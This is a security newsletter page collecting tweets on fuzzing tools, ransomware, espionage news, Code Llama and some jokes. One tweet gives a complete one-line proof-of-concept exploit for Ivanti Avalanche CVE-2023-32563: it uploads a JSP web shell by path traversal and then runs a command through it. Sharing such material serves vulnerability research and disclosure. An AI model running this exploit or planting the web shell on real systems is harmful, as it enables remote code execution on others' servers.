the grugq's newsletter

August 25, 2023

... and this is pretty cool! #Ghidralligator is a C++ multi-architecture pcode emulator based on the #Ghidra libsla designed for #fuzzing with AFL++. It allows performing emulation-based fuzzing when dealing with binaries running on exotic architectures. https://t.co/V4RybiNrEC

— raptor@infosec.exchange (@0xdea) August 23, 2023

Is computer hacking a crime (1989)

https://faculty.weber.edu/apainter1/Readings/Hacking%20a%20Crime.pdf


🚨 Wow. Imagine waking up, and your entire company's online presence is erased.

Email. Domain. Documents. Databases. Gone

Poof.

Well, that's what happened to customers of two hosting providers this week. 👇

— Matt Johansen (@mattjay) August 24, 2023

If I were a renaissance painter manager again, here's a stat I'd track:

Brush strokes on canvas.

Total weight of oil paint delivered on canvas.

I am sure this would help me get more Michelangelo paintings. https://t.co/mEPhxCqVtu

— Halvar Flake (@halvarflake) August 25, 2023

... ... and here is how the Chandrayaan-3 Rover ramped down from the Lander to the Lunar surface. pic.twitter.com/nEU8s1At0W

— ISRO (@isro) August 25, 2023

Meme explainer for #ransomware #cybersecurity #infosec #Memes pic.twitter.com/zTt0nYPYRz

— CyberKnow (@Cyberknow20) August 24, 2023

The Upside of Falling Down: Embracing Failure to be a Better Hacker (and Human) slides are up! Video from @HITBSecConf #HITB2023HKT coming soon. https://t.co/4mpE1oiI2B

— Joe Grand (@joegrand) August 25, 2023

https://t.co/uG5x8hplI1

— Dr. Dan Lomas (@Sandbagger_01) August 25, 2023

By accusing two Chinese nationals of spying for the U.S., China's spymasters are warning citizens abroad to guard against CIA enticement https://t.co/gN1zw6j3Cb via @WSJ

— Dr. Dan Lomas (@Sandbagger_01) August 25, 2023

Ivanti Avalanche CVE-2023-32563:

curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe

— wvu (@wvuuuuuuuuuuuuu) August 25, 2023

We need more efforts like the ones supporting memory safety, but for securing open-source package repositories.

The @Phylum_IO research team has been putting out some outstanding reporting. https://t.co/SShsKSjKYs pic.twitter.com/UVQUrtu9pL

— Silas // p1nk (@silascutler) August 25, 2023

Weekly analysis is out

- 🇨🇳 ops in 🇰🇷 using 🍟
- 🇨🇳 ops in 🇭🇰 and SE Asia via supply chain
- 🇰🇵 ops on ₿ get $2bil in 5 years
- 🦹‍♀️ ops on 🍎 using signed code
- 🦹🏻 ops deploying 📡 geo implants
- 🦹🏽‍♂️ ops from 🇸🇾
- ☁️ backdoors

plus the usual tradecraft etc. https://t.co/MS0wJKGyKT

— Ollie Whitehouse (@ollieatnowhere) August 25, 2023

The UK's @NCSC has launched its research problem book - https://t.co/ecDFHB4rp4 cover 5 topics including:

- How can we build systems we can trust?
- How do we make system security assessments more data driven?

etc. https://t.co/uuGWhdazQz < support blog..

— Ollie Whitehouse (@ollieatnowhere) August 24, 2023

This week's SRB is out:
- Why Russia's Cyber War Against Ukraine Failed
- Advanced Persistent Teenagers
- The latest open source hippies

Read and subscribe here: https://t.co/zHBs4Vvsmu

Or listen: https://t.co/y5Xy7ztjUM pic.twitter.com/RLlyZfvrFw

— Tom Uren (@tomatospy) August 25, 2023

We haven't been very public with it yet, but @EricMichaud formally announced at @HITBSecConf Project Keybleed by Unciphered.

Looking for the haveibeenpwned of cryptowallets, here you go! https://t.co/FQHsJYD9eH

— Unciphered LLC (@uncipheredLLC) August 25, 2023

Lady was pissy when I insisted on walking with her to the parking lot, but it was raining and she had an umbrella.

— Forward March (@RunOldMan) September 14, 2020

me: I just want 2 minutes of privacy in the bathroom

my kid: best I can do is a paleontology lecture

— meghan (@deloisivete) January 28, 2022

A little old random fun fact about Exchange that probably not everyone knows. Very often you will see the following "ou=Exchange Administrative Group\FYDIBOHF23SPDLT" referenced.

That FYDIBOHF23SPDLT might look random, but it is not. (Caesar's cipher 1 to the left 😉)

— Oddvar Moe (@Oddvarmoe) August 24, 2023

I come from a long line of successful people. I decided to stop that tradition.

— MomofTeen (@MomofTeen) March 14, 2015

Code Llama is here, including first release of a 34B Llama2 model. It is competitive with WizardCoder 15B (better at python, possibly worse at others) and beats GPT-3.5 in both HumanEval and MBPT coding benchmarks. https://t.co/nG7wPX7irw

— Richard Johnson (@richinseattle) August 25, 2023